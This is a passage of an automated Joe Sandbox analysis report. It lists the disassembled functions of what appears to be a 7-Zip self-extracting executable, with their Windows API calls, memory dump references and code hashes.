                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: TextWindow$ItemLength$??3@wsprintf
                                                                                                                                                                                                                                                • String ID: (%u%s)
                                                                                                                                                                                                                                                • API String ID: 3595513934-2496177969
                                                                                                                                                                                                                                                • Opcode ID: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                                                                                                                                                                                                                                • Instruction ID: 1b031bef2a273fddd3247fbc9e57f9590cc69a100d620b238320e5a3a24b3f72
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1401C8B15042147FDB107B65DC46EAF777CAF44708F10807FF516A21E2DB7CA9448A68
                                                                                                                                                                                                                                                Function 004021ED Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00402211
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                • String ID: GetNativeSystemInfo$kernel32
                                                                                                                                                                                                                                                • API String ID: 2574300362-3846845290
                                                                                                                                                                                                                                                • Opcode ID: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                                                                                                                                                                                                                                • Instruction ID: b757a3d5c4c17e34abb063926c294d8abaed4bc4edbc3347b9308a3de004b423
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88F0B432E1521495CF20BBF48B0D6EF66E89A19349B1004BBD852F31D0E5FCCE8141EE
                                                                                                                                                                                                                                                Function 00402185 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040219F
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                                                                                                                                                                                                • API String ID: 2574300362-3900151262
                                                                                                                                                                                                                                                • Opcode ID: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                                                                                                                                                                                                                                • Instruction ID: b94e249185ae4a70534d65e1a66e6cdcdba3a47a1e4784fabdbc91f5644b18b3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AFD0C934294201DBDB125FA0EE0E7EA3AB9FB04B0BF458035A920A00F0CBBC9644CA5C
                                                                                                                                                                                                                                                Function 004021B9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004021D1
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                                                                                                                                                                                                • API String ID: 2574300362-736604160
                                                                                                                                                                                                                                                • Opcode ID: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                                                                                                                                                                                                                                • Instruction ID: 817513c890d082da38b6284c2862a66e2f32a8da2897575df7e5c1eb8648f331
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DD012342443009BDB515FA09E0D7DA3EB4B705B07F508076A520E11D1CBFCA244C7AC
                                                                                                                                                                                                                                                Function 00402A69 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                                                                                                                                                                                                                                  • Part of subcall function 0040272E: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402ACD,?,?,00000000,00000000,00000000), ref: 00402760
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@$ByteCharMultiWide
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1731127917-0
                                                                                                                                                                                                                                                • Opcode ID: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                                                                                                                                                                                                                                • Instruction ID: 3903ebf3ba6088976d83fc344d3b185d6a20d7f45533e28e7dbc13297377a7b4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2831B3729041156ACB14FFA6DD81DEFB3BCEF00714B51403FF952B31E1EA38AA458658
                                                                                                                                                                                                                                                Function 00403F85 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406437,00000000,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FA8
                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FC5
                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00403FFB
                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00404016
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: PathTemp$AttributesFilewsprintf
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1746483863-0
                                                                                                                                                                                                                                                • Opcode ID: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                                                                                                                                                                                                                • Instruction ID: 4b01c17e8612d334da970e7aef70975a1f373095b445c13461924cc76c43a46f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B113672100204BFCB01AF59CC85AADB7F8FF88755F50802EF905972E1DB78AA008B88
                                                                                                                                                                                                                                                Function 00401A85 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharUpperW.USER32(?,7591E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                                                                                                                                                                                                • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                                                                                                                                                                                                • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B03
                                                                                                                                                                                                                                                • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B13
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CharUpper
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 9403516-0
                                                                                                                                                                                                                                                • Opcode ID: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                                                                                                                                                                                                                • Instruction ID: 0ba0c8867aa888139ba8faa8f8ff432121b60ad667f2455bf366b55ac651d143
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02112E34A11269ABCF108F99C8446BAB7E8FF44356B504467F881E3290D77CDE51EB64
                                                                                                                                                                                                                                                Function 00407FA5 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                                                                                                                                                                                                                  • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                                                                                                                                                                                                  • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00407FED
                                                                                                                                                                                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040800D
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000004B7), ref: 00408020
                                                                                                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000FC,Function_00006F37), ref: 0040802E
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                                                                                                                                                                                                                  • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                                                                                                                                                                                                                  • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ItemWindow$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoLongShow
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2538916108-0
                                                                                                                                                                                                                                                • Opcode ID: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                                                                                                                                                                                                                • Instruction ID: 9218ed989044434557cb474aaa53437228351995edfdd36a91d94446a14b3a18
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D1186B1A402146BCB10BBB99D09F9EB7FDEB84B04F00446EB652E31C0D6B8DA008B54
                                                                                                                                                                                                                                                Function 004067ED Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00406814
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 0040683A
                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00406849
                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00406878
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1900162674-0
                                                                                                                                                                                                                                                • Opcode ID: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                                                                                                                                                                                                                                • Instruction ID: e152b01862f646c7a4819b14062263d5307cf72e2961abd6127bac75ebed32e6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9116376A00205AFDB10DF94DC88FEAB7B8EB08300F0180AAED06A7291DB74DE54CF54
                                                                                                                                                                                                                                                Function 0040748A Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040749F
                                                                                                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 004074B8
                                                                                                                                                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 004074D4
                                                                                                                                                                                                                                                • SHGetMalloc.SHELL32(00000000), ref: 004074FE
                                                                                                                                                                                                                                                  • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                                                                                                                                                                                                                  • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1557639607-0
                                                                                                                                                                                                                                                • Opcode ID: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                                                                                                                                                                                                                                • Instruction ID: 30b51fec80d89fd3ac1614d0428bedaa433d1aa4d1a510c8e8bcd0531de43efe
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43112171A00114ABDB10EBA5DD48BDE77FCAB84715F1040A9E505E7280DB78EF05CB75
                                                                                                                                                                                                                                                Function 004027C7 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004027F8
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00402801
                                                                                                                                                                                                                                                  • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                                                                                                                                                                                                  • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,00000000), ref: 00402819
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00402839
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 612612615-0
                                                                                                                                                                                                                                                • Opcode ID: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                                                                                                                                                                                                                                • Instruction ID: 71972da321696c7643696fa2d61077c4bfdb6251f9c85b9dd911fab2e4c9aeed
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF017976D00118BADB04AB55DD41DDEB7BCEF48714B10417BF901B31D1EB746A4086A8
                                                                                                                                                                                                                                                Function 00403AB1 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                                                                                                                                                                                                  • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00413550,00413558), ref: 00403AFD
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00413550,00413558), ref: 00403B05
                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00403B12
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403B1D
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
